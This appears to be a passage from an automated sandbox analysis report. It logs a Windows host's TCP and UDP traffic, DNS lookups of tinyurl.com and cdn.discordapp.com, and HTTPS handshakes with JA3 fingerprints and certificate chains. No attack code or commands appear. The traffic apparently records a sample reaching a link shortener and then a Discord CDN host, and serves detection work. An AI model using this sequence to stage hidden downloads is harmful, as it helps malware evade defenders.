                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.681525946 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.693821907 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.694204092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.710333109 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.722830057 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744155884 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744179964 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744191885 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744199991 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744215965 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744230032 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744239092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744251966 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744266033 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744293928 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744302988 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744314909 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744323015 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744334936 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744348049 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744355917 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744368076 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744374990 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744380951 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744394064 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744398117 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744404078 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744410038 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744422913 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744440079 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744452953 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744472027 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744489908 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744493961 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744509935 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744518995 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744524956 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744529963 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744546890 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744564056 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744600058 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744683981 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745109081 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745197058 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745378017 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745414972 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745481014 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745562077 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745574951 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745621920 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745654106 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745678902 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745697021 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745708942 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745748043 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745780945 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745856047 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746119976 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746197939 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746296883 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746315002 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746381998 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746382952 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746398926 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746416092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746433973 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746450901 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746464014 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746469975 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746486902 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746490002 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746507883 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746526003 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746540070 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746542931 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746562004 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746575117 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746586084 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746614933 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746649027 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746743917 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746751070 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746752977 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746767998 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746819973 CET49734443192.168.2.3162.159.129.233
Nov 19, 2020 09:32:53.757181883 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757206917 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757261992 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757508039 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757533073 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757551908 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757570982 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757570982 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757606983 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757698059 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757721901 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757740021 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757775068 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757795095 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757812023 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757813931 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757831097 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757843018 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.757930994 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757949114 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757966995 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.757983923 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758014917 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758121967 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758140087 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758161068 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758181095 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758191109 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758198977 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758217096 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758230925 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758269072 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758301973 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758320093 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758332014 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758352041 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758367062 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758373976 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758443117 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.758968115 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.758994102 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759010077 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759028912 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759046078 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759046078 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759069920 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759094000 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759149075 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759169102 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759186983 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759224892 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759309053 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759325027 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759341002 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759362936 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759371996 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759382963 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759391069 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759419918 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759438992 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759462118 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759494066 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759512901 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759660006 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759695053 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759715080 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759733915 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759804010 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759828091 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759870052 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759926081 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.759943008 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.759984016 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.760035038 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.760083914 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.760101080 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.760149002 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.765600920 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.766422987 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770040989 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770203114 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770250082 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770277977 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770560026 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770591021 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770622015 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770663977 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770690918 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770786047 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770803928 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770819902 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770838022 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770848036 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770854950 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770872116 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770883083 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770890951 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770909071 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.770917892 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.770951033 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.771065950 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771097898 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771121025 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771152020 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.771161079 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771178007 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771205902 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.771208048 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771229029 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771246910 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771253109 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.771297932 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.771317005 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771334887 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771351099 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.771378040 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.772911072 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.773907900 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.778013945 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.778040886 CET  443    49734  162.159.129.233  192.168.2.3
Nov 19, 2020 09:32:53.778090954 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:53.848396063 CET  49734  443    192.168.2.3      162.159.129.233
Nov 19, 2020 09:32:55.179301023 CET  49733  443    192.168.2.3      104.20.138.65
Nov 19, 2020 09:32:55.180057049 CET  49734  443    192.168.2.3      162.159.129.233

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2020 09:31:31.741789103 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:31.754936934 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:32.903134108 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:32.915582895 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:33.916826010 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:33.929847956 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:35.075479031 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:35.089077950 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:36.116816998 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:36.129893064 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:36.976680040 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:36.992295980 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:42.882538080 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:42.894809961 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:44.111989021 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:44.158605099 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:44.486104012 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:44.511749983 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:44.823503971 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:44.836879015 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:45.499190092 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:45.512027025 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:46.503814936 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:46.524812937 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:48.500957966 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:48.514363050 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:48.698323965 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:48.710694075 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:52.501451969 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:52.514358997 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:31:58.914940119 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:31:58.927234888 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:00.446456909 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:00.459573030 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:01.536395073 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:01.561336994 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:11.895518064 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:11.908122063 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:20.207458973 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:20.227149963 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:21.277956963 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:21.296295881 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:21.341136932 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:21.354634047 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:21.391946077 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:21.411410093 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:46.098938942 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:46.125849962 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:52.648489952 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:52.661617994 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:53.444211006 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:53.456526041 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:32:56.976692915 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:32:56.995260954 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:33:23.189728022 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:33:23.202099085 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:33:25.075480938 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:33:25.109967947 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Nov 19, 2020 09:34:00.039959908 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Nov 19, 2020 09:34:00.058621883 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 19, 2020 09:32:52.648489952 CET | 192.168.2.3 | 8.8.8.8 | 0x1383 | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.444211006 CET | 192.168.2.3 | 8.8.8.8 | 0x7ace | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 19, 2020 09:32:52.661617994 CET | 8.8.8.8 | 192.168.2.3 | 0x1383 | No error (0) | tinyurl.com | - | 104.20.138.65 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:52.661617994 CET | 8.8.8.8 | 192.168.2.3 | 0x1383 | No error (0) | tinyurl.com | - | 104.20.139.65 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:52.661617994 CET | 8.8.8.8 | 192.168.2.3 | 0x1383 | No error (0) | tinyurl.com | - | 172.67.1.225 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET | 8.8.8.8 | 192.168.2.3 | 0x7ace | No error (0) | cdn.discordapp.com | - | 162.159.129.233 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET | 8.8.8.8 | 192.168.2.3 | 0x7ace | No error (0) | cdn.discordapp.com | - | 162.159.130.233 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET | 8.8.8.8 | 192.168.2.3 | 0x7ace | No error (0) | cdn.discordapp.com | - | 162.159.133.233 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET | 8.8.8.8 | 192.168.2.3 | 0x7ace | No error (0) | cdn.discordapp.com | - | 162.159.135.233 | A (IP address) | IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET | 8.8.8.8 | 192.168.2.3 | 0x7ace | No error (0) | cdn.discordapp.com | - | 162.159.134.233 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Nov 19, 2020 09:32:52.833199024 CET | 104.20.138.65 | 443 | 192.168.2.3 | 49733 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
  Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US | Mon Aug 03 02:00:00 CEST 2020 | Tue Aug 03 14:00:00 CEST 2021
  CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:46:39 CET 2020 | Wed Jan 01 00:59:59 CET 2025

Nov 19, 2020 09:32:53.492600918 CET | 162.159.129.233 | 443 | 192.168.2.3 | 49734 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
  Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=ssl711319.cloudflaressl.com | CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Oct 27 01:00:00 CET 2020 | Thu May 06 01:59:59 CEST 2021
